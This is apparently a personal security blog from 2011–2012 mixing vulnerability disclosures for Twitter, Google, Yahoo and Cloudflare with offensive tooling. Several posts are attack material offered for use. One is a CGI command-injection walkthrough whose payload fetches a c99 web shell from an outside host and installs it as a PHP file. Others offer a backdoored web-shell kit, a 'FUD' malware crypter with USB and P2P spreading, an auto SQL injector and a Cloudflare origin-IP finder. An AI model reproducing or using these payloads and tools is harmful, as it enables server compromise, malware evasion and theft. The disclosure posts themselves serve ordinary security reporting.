FatCat Auto SQL Injector

January 10, 2012

This is an automatic SQL Injection tool called as FatCat, Use of FatCat for testing your web application and exploit your application more deeper. FatCat Features that help you to extract the Database information, Table information, and Column information from web application.
Only If it is vulnerable to Mysql SQL Injection Vulnerability.

The user friendly GUI of FatCat and automatically detect the sql vulnerability and start exploiting vulnerability.

Features

1)Normal SQL Injection
2) Double Query SQL Injection

In Next Version

1) WAF bypass
2) Cookie Header passing
3) Load File
3) Generating XSS from SQL

Requirement

1) PHP Verison 5.3.0
2) Enable file_get_function

Print Screen 

Click image for larger version Name: fatcat.jpg Views: 6 Size: 15.4 KB ID: 180

Download

http://code.google.com/p/fatcat-sql-injector/downloads/list

Video

http://dl.dropbox.com/u/18007092/FatCat.swf

We Provide Penetration Testing

Twitter [Mobile] Account Settings Cross Site Scripting and Multiple Html Injection

January 5, 2012

————————
0x1 Title: Twitter [Mobile] Account Settings Cross Site Scripting and Multiple Html Injection Vulnerability
0x2 Script Link: https://mobile.twitter.com/settings
0x3 Author: Sandeep kamble
0x4 Reported: December 28 ,2011
0x5 Vulnerability Fix date : Jan 05 ,2012
0x6 Public Release: Jan 05 ,2012
0x7 Browser : FireFox , IE
0x8 OS : Win7 , Ubantu
——————————————————————–

Description of script:

Twitter providing features to protect the user privacy, using account setting you can protect your Tweets, you can change Username, you can change your password, and you can change your E-mail address.

Affected script URL:

URL #1: https://mobile.twitter.com/settings/screen_name
URL #2: https://mobile.twitter.com/settings/name

Vulnerability Description:

1) Cross Site Scripting Vulnerability ( Twitter mobile is infected User Side XSS as well as it was protected to click jacking ):

Cross-Site Scripting attack is type of injection, in which malicious java scripts are injected into the web sites dynamic page.

2) HTML Injection Vulnerability (Twitter mobile is infected User Side , one html injection was stored )

HTML Injection is a type of injection, in which malicious HTML Code injected into the web sites Pages.

Exploit Description + Proof of Concept:

URL #1: https://mobile.twitter.com/settings/name

Title #1: Stored HTML Injection Vulnerability

In the above URL there is one input box to change the name. The HTML code of the input box is following.

Image1

As the twitter allow only 20 Characters in the name filed.
If we try executing the malicious HTML Code then HTML code look like as follows

HTML Code : “>sandeep

Image2

Malicious HTML code successfully executed with correct syntax of input box. As following show the output of the above input box code execution.

image4

URL #2: https://mobile.twitter.com/settings/name
Title #2: Cross Site Scripting and HTML Injection Vulnerability

In the above URL there is one input box to change the user name. The html code of the input box is following.

image7

In the input box we can execute the JAVA script as well as html Code so that is vulnerable to Cross site scripting and HTML Code injection Vulnerability

JS : ” > < s cr i pt> a lert (document.domain)< / scrip t >

image9

Malicious JS code successfully executed with correct syntax of input box. As following show the output of the above input box code execution.

image100

Similarly we can execute HTML Code but it is not stored HTML Code Execution.

image5

Check Out Video Here

http://dl.dropbox.com/u/18007092/twitter.swf

Countermeasure

1) Determine whether HTML output includes input parameters
2) In short perform input sensitization


Warm Regards,
Sandeep Kamble
www.sandeepkamble.com

We Provide Penetration Testing

Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)

December 20, 2011

#Title: Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)
#Author: Sandeep Kamble
#Risk Factor: Low (Why low please read below)
#Attack Type: A User can access B User account Link to remove secondary E-mail address
#Reported Date: OCT 21 , 2011

Overview:

In Google account setting page, when you reset Google account password, it send Reset Password link to your secondary email address. Into that mail there is one more link which can be used remove your secondary email address.

Vulnerability Description:

This Vulnerability can be used to remove secondary email address. In this vulnerability we needed to guess ?C variable token to access the any users account link that can be used to remove secondary email address ?C variable token is generating at sever side so that it is not possible to guess this token and so that it can be performed at victim side only. (Self Exploitation)

Vulnerable Link

Link it has two options, one option is to remove the Secondary and one option to negated email removing operation.
The above like is accessible to everyone. We cannot generate the token number so we can find the token using

Google Dork: Inurul : /AccountDisavow?c=

If you click on the radio button, “No, I didn’t create *******@gmail.com – remove my email address, ********@yahoo.com, from this Google Account. “ and then click continue it will remove the email and delete the link token.
This link will be dead, No one can access it again !

But if you click on the,” Yes, *******@gmail.com is my Google Account. ” and press continue.
When u Click on the this radio button the token is not getting deleted, so that may be pages are indexed into Google

Proof of Concept
POC

POc2

Finally I got Awarded By Google

Google Hall Of fame

Special thanks to Amol Naik , Anil , veenu bhai

Warm Regards

Sandeep Kamble
www.sandeepkamble.com

We Provide Penetration Testing

Make BackDoored WebShell

October 17, 2011

Supp ,
I have made one very small PHP script to steal shell URL (backdoored web-shell).
To steal the shell URL u needed pest one Javascript line into the Webshell .

Like i have made this web-shell backdoor-ed

http://pastebin.com/naKpYfzV

Download Script :

http://dl.dropbox.com/u/18007092/bc.zip

/sandeep Kamble

We Provide Penetration Testing

http://anti-virus.cloudflare.com XSS(Cross Site Scripting) Vulnerability

0×1 Site : http://anti-virus.cloudflare.com
0x3 Author : Sandeep Kamble
0×4 Reported : October 12, 2011
0×6 Public Release : October 17 2011
0x7 Status: Fixed

Description :

Anti-virus.cloudflare.com is a service for avoiding spams .
This project to stop attacks and educate visitors with infected computers about how they can clean up their machines.

Affected Variable :
?b_src=

Exploit :
Executing Javascript using the vulnerable variable called as ?b_src= . This attack is commonly know as Cross Site Scripting (XSS)
Anti-virus.cloud + affected script having stored Xss attack which can used for the grabbing the cookies .

POC :

Screen Shot :

Cloud XSS


Countermeasure :

1) Determine whether HTML output includes input parameters
2) In short perform input sensitization

Conclusion

I like to thank the cloudflare Security Team for their quick responses to my reports.

We Provide Penetration Testing

Get Real IP Address Behind Cloudflare | Made by : ev1lut10n

October 8, 2011

New web based tool to get ip address behind cloudflare’s dns proxy

Link http://teksan-tekstroy.com/cloudflare

(forbidden domain : jasaplus.com ,gaharu-2.net,gaharuindah-2.net,devilzc0de.org)

Target using cloudflare..please wait…searching real ip address…

got valid IP v4 address

[+] Checking port 80 on possible real ip address wheter it’s open or not

open port:80 on : 67.23.70.62

[+] W00t got possible real ip behind cloudflare : 67.23.70.62

We Provide Penetration Testing

RCE to shell upload [CGI]

September 27, 2011

Author: Sandeep Kamble
Released Date: September 9, 2010

Common Gateway Interface (CGI) Communication:-
1. CGI is a server-side solution. Each time a CGI script is executed, a new process is started.
2. TCP/IP is the communications protocol used by the CGI script and the server during the communications.
3. CGI can also perform transaction recording using standard input and standard output.
4. The three methods pertinent to this discussion are the `Get` method, the `Post` method, and the `Put` method. The `Get` method retrieves information from the server to the client. The `Post` method asks the server to accept information passed from the client as input to the specified target. The `Put` method asks the server to accept

information passed from the client as a replacement for the specified target.

Vulnerabilities:-

1. Insecure file permissions can be exploited using FTP or telnet.
2. The primary weakness in CGI scripts is insufficient input validation.

Example site:-
http://www.victim.com/newswire/newsaction.cgi?article=999999998473.992039800995

Exploit:-
The front end interface to a CGI program is an HTML document called a form. Forms include the HTML tag “Input”. Each “Input” tag has a variable name associated with it. This is the variable name that forms the left hand side of the previously mentioned variable=value token. The contents of the variable forms the value portion of the token. Actual CGI scripts may perform input filtering on the contents of the “INput” field. However if the CGI script does not filter special characters, then a situation analogous to the above example exists. Interpreted CGI scripts that fail to validate the “Input”
data will pass the data directly to the interpreter. **

Example:-
http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|pwd|

Shell upload command:-

http://www. victim.com/newswire/newsaction.cgi?article=999999998473.992039800995|wget%20http://www.saldiri.org/c99.txt;mv%20c99.txt%20uploadedimage.php;ls%20-la;pwd|

Shell:-

http://www.victem.com/newswire/uploadedimage.php

Conclusion:-

The improper use of CGI scripts affords users a number of vulnerabilities in system security. Failure to validate user input, poorly chosen function calls, and insufficient file permissions can all be exploited through the misuse of CGI.

After shell upload you can try for more.I hope you find it useful , be safe !

We Provide Penetration Testing

XCrypt & USG 1.3 [FUD]

September 25, 2011

This Is Crypter with Universal Stub Generator 1.3 & USG is written in VB.net.
Its got Spread options, P2P, USB, & Startup
File Clone, Icon and File Info and then the other PE options u see listed, like add section, strip relocations, change entrypoint etc.

Make Your Stuff FUD

http://dl.dropbox.com/u/18007092/XCrypt%20%26%20USG%201.3.rar

We Provide Penetration Testing

Yahoo.Com Reset Page Wicked Behavior

September 15, 2011
Page: https://edit.india.yahoo.com/forgot
Risk Factor : Minor

once, i was just playing with yahoo reset page and i found one
interesting thing there. The password reset steps could be skipped, i
was successful in skipping 1 step and found some interesting behavior
on entering different characters. Here, is what you have to do to
observe it :-

1] Goto URL :-   https://edit.india.yahoo.com/forgot
2] In the My Yahoo ID textbox enter this :- "s
3] You will be passed to next step => Please select an option to reset
your password.

Similarly if u enter the following in the text box u'll find some
interesting things :-
1) "1        =>         Page will ask you B'day , Country of Residence
and Postal Code
2) "12      =>         It will change the yahoo page language
3) "123    =>         It will change the yahoo page language to Korean

After discussing with some friends i found that it may be a database
default value which is used by programmers for testing purposes.

Peace
Sandeep Kamble
We Provide Penetration Testing

www.subhashdasyam.com

He is writer of Online Anti-virus scanner. He developed various Tools and scripts .

More Details

http://www.subhashdasyam.com/p/online-antivirus-scanner.html

 

We Provide Penetration Testing


We Provide Penetration Testing